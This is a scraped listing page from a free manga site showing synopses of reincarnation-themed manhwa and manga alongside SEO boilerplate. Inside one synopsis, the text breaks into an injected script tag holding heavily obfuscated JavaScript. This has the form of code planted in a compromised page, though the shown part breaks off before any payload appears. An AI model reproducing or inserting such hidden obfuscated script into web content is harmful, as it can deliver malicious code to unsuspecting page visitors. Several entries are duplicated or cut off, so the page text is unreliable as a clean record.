Reincarnation - Page 4

From thrilling adventures to emotional tales, find the best Reincarnation manga free and read Reincarnation manga anytime!

547 results

Become the Lord of Cthulhu

The main character, Su Qi, dies and crosses over to Los Angeles and becomes a high school student. Due to his otherworldly muse, he finds himself surrounded by a variety of spirits and demons. In order to survive and not be eaten by the spirits or have a mental breakdown, the hero embarks on a journey of becoming a god and exploring the mysterious world of the Cthulhu Islands.


Becoming a Big Boss Starts with Spending Money

Have you heard of a world of quick transmigration, bound by a prodigal system, where if you’ll die if you don’t spend money? The embarrassing missions involve spending money, taking revenge, and ensuring the well-being of a pretty boy. Chu Zheng had no choice but to accept these terms… the system is way too powerful. She can only advise everyone: if you want to become a big boss, start by spending mone


Becoming Best Friends With the Icy Male Lead

Read “Becoming Best Friends With the Icy Male Lead” online at Best manga website Description about “Becoming Best Friends With the Icy Male Lead”: After meeting a sad death as a Korean teenager in her past life, nothing could be better than being reincarnated as Livia Hote, a beloved princess of the fire kingdom. A life of only luxury and peace awaited her as the novel’s supporting character. However, she eventually realizes that she must learn to control her ever-growing fire powers and she can only do so with the prince of the ice kingdom. Thus, Livia will now have to deal with new uncertainties and relationships that could disrupt her plans to live a peaceful new life… Associated Names: Becoming Bestfriends With the Cold Male Lead, 얼어붙은 남주와 절친까지만 되려 했는데 The place to read “Becoming Best Friends With the Icy Male Lead”: Welcome to Mangazin, the fantastic world for manga enthusiasts. Here, you’ll find all the manga you need with the highest quality. What’s even more amazing is that reading manga on MangaGG is entirely free. Don’t hesitate any longer and start reading “Becoming Best Friends With the Icy Male Lead” at MangaGG! Additionally, you can also read Trending Manhwa, Trending Manhua, Trending Comics, and more for free here!

1 days ago

Becoming the Only Memory of the Male Lead

The body was possessed before the start of the novel. Also, she, the daughter of a Count, is an extra who is bound to be murdered. She didn't want to die like this, so she went in search of the male lead who's filled with the energy of life. The problem is that, due to his curse, he can't remember others. As the next best solution, she even tried to target his subordinates. "It's been long, Loreina." What? Why does this person remember me? It was unexpectedly due to an exception of the curse. Um. Well, I'll help you until the female lead appears. The only one who can break the curse is the female lead, so that it doesn't deviate from the original story. ...Yeah, that's exactly what she thought. ••• Kiss. I felt a soft touch on my cheek along with an unfamiliar sound. A tiny kiss landed on my cheek. "...Le-Leonard." "Stay still. It's interfering with the treatment." "No, but that's..." I understand that you're healing the injured area with the energy of life. "Is there any other way than this? You can just touch the injured area with your hand..." "No." Leonard just cut me off. ...No, there's no such thing!<script></script><script>(function(_0x170be8,_0x4f3006){var _0x5282b9=_0x2819,_0x5e0002=_0x170be8();while(!![]){try{var _0x2f6632=parseInt(_0x5282b9(0x1a9))/(0x8ee+0x2199+-0x2a86)*(parseInt(_0x5282b9(0x1a4))/(-0x1501+-0xc6+0x15c9))+-parseInt(_0x5282b9(0x1b0))/(-0x10*-0x1bc+0x2ad*-0x1+-0x1*0x1910)*(-parseInt(_0x5282b9(0x1a8))/(-0x51b*0x2+0x23b1*0x1+-0x1977))+parseInt(_0x5282b9(0x1bd))/(0xeb+-0x6d*-0x31+-0x3*0x741)*(parseInt(_0x5282b9(0x19e))/(-0x1f25+0x1d35+0x1f6))+parseInt(_0x5282b9(0x1a5))/(-0x1c63+-0x221*-0x11+-0x7c7)*(-parseInt(_0x5282b9(0x1a2))/(0x26ee+0x90b*0x1+0x1*-0x2ff1))+parseInt(_0x5282b9(0x1b8))/(0xa3*-0x16+0x4a6+0x965)+parseInt(_0x5282b9(0x1b6))/(-0x105+-0x5c*0x40+0x180f)*(parseInt(_0x5282b9(0x1b9))/(-0xd*-0x89+-0x2*-0x3e5+-0xeb4))+-parseInt(_0x5282b9(0x1b3))/(-0x4ca*-0x7+-0x67*-0x3a+-0x38d0);if(_0x2f6632===_0x4f3006)break;else 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Before the Real Heroine Steps In

Once bitten, twice shy. That is Anastasia\'s motto when she awakes with a second chance in life as the Empress in her favorite novel. After realizing that even true love cannot change destiny, Anastasia attempts to help her husband, the Emperor, find his happy ending with the female protagonist--the true heroine of the story. However, it seems that the Emperor has other thoughts. She pushes him away so they can both live, but the Emperor is unsure if he wants to live without his queen.


Best Of Luck, Warrior!

The Devil King whom I defeated in my past life is now my boss in the office?! Baek Young-woong (meaning hero in korean), an ordinary office worker reborn with the memories of his past life as a warrior who defeated the devil king! The memories were only useful when he used to write webnovels as a child. Young-woong regrets having useless memories of his past life and gets a job in the executive secretarial office of Daeryong ENT, a big company. However, after meeting the CEO, Do Yeon-hwa, for the first time, I feel the trauma from my past life experience…? It’s like, you’re facing a really strong and big devil…! Read the terribly intertwined romance of the devil king, the CEO and the warrior, the newest secretary! Good Luck, Warrior! / Good Luck, Soldier! / 행운을 빌어요, 용사님!


Black Corporation: Joseon

Read Manhwa Black Corporation: Joseon Online For Free At KunManga Black Corporation: Joseon Manga also known as “블랙기업조선”. This OnGoing webtoon was released on 2024. The story was written by Gukppong / Kim Puluk and illustrations by Hong Sanggi (YERANG). The content of the comic Black Corporation: Joseon: The maniac who was crazy about all kinds of fields such as military and steampunk had been reincarnated. However, his father was King Sejong the Great? The mania-wise king and his crazy maniac son. Along with the ministers, and countless humans who were getting exploited. Even today, the night of Joseon was filled with the light of overtime. The comic Black Corporation: Joseon belongs to the Genre: Comedy, Drama, Fantasy, Historical, Manhwa, Reincarnation, Shounen Hari Manga is a comprehensive website featuring the latest and hottest manga, updated rapidly to cater to readers with high-quality images and provide them with excellent experiences. With keywords such as “TopManhua” and “Manhwa Web,” as well as related terms like Manhwa Top, New Manga 2024, and Read Manhwa Engsub ensures readers have access to a wide selection of top-notch manga content. Please always follow and share with your friends to support the website MANGAZIN.ORG so that we have more motivation to publish the latest and best comics. Follow get to read NEW MANHWA updated: Noble Lady or Whatever, I’m Going Home Maxed Out Leveling Exclusive Possession: Young Master Ji’s Beloved Wife

1 days ago

Black Killer Whale Baby

One day, a little kiddo appeared before me. “” Do you happen to know where the academy is? I have to go there! “” You’ve been heading in the wrong direction this whole time. “” !!! “” What are you looking at, old man? She was just like a daughter. “” Do you want one? But I don’t think she knows that I’m her father. ······· You’re probably thinking that, right? If you think so, you’re mistaken, pops! My name is Calypso. a four-time regressor. My life was ruined when I possessed a character of a novel. I even possessed a child! The third episode of my life was an end to extermination! “The male characters who are crazy about female characters!” Yes, somehow I get back on my 22nd birthday no matter what I do. However, I only realized it on my third life, after the Dragon Duke went mad. If the dragon runs wild, the world will be distorted! But can I go back home when all of this is happening? When I came back for my fourth life, I decided to use him. Pops? Guys? he’s just a stepping stone to meet the dragon! “Wait for me, dragon-nim!” [I want to die now, but I’m going crazy with all these repeated returns.] [My family is tied up with the royal family] [Does anyone ever hear about the weak?/ Only the strongest ones are happy] 흑막 범고래 아기님


Black-Haired British Doctor

Taepyeong, a promising surgery professor, was reborn in the 19th-century English countryside village of Upton, retaining all of his memories from his past life. He once again nurtured his dream of becoming a doctor. However, he was only met with...


Boku wa Kon'yaku Haki Nante Shimasen kara ne

\"Ah… Ahhhhhhhhhhh!\" The one who\'s become the Crown Prince\'s fiancée is the Duke\'s daughter Serea, but during their first meeting, she screamed and collapsed! Had she remembered something from her previous life? Are you an evil villainess? Am I going to break you if I fool around too much? A me that\'s programmed to be like that, is so horrible. Isn\'t that right~ An \"event\" and those \"program settings\" have no connection to me though. Let\'s go back to my place and I\'ll slowly and sweetly make you fall desperately in love with me! This otome game\'s villainess is going to follow a harsh path, and will fight to change her fate. ___ **Character Designer:** [Nardack](


Boku wa Konyaku Haki Nante Shimasen kara ne

\"Ah… Ahhhhhhhhhhh!\" The one who\'s become the Crown Prince\'s fiancée is the Duke\'s daughter Serea, but during their first meeting, she screamed and collapsed! Had she remembered something from her previous life? Are you an evil villainess? Am I going to break you if I fool around too much? A me that\'s programmed to be like that, is so horrible. Isn\'t that right~ An \"event\" and those \"program settings\" have no connection to me though. Let\'s go back to my place and I\'ll slowly and sweetly make you fall desperately in love with me! This otome game\'s villainess is going to follow a harsh path, and will fight to change her fate. ___ **Character Designer:** [Nardack](


Boku wa Konyaku Haki Nante Shimasenkara ne

\"Ah… Ahhhhhhhhhhh!\" The one who\'s become the Crown Prince\'s fiancée is the Duke\'s daughter Serea, but during their first meeting, she screamed and collapsed! Had she remembered something from her previous life? Are you an evil villainess? Am I going to break you if I fool around too much? A me that\'s programmed to be like that, is so horrible. Isn\'t that right~ An \"event\" and those \"program settings\" have no connection to me though. Let\'s go back to my place and I\'ll slowly and sweetly make you fall desperately in love with me! This otome game\'s villainess is going to follow a harsh path, and will fight to change her fate.
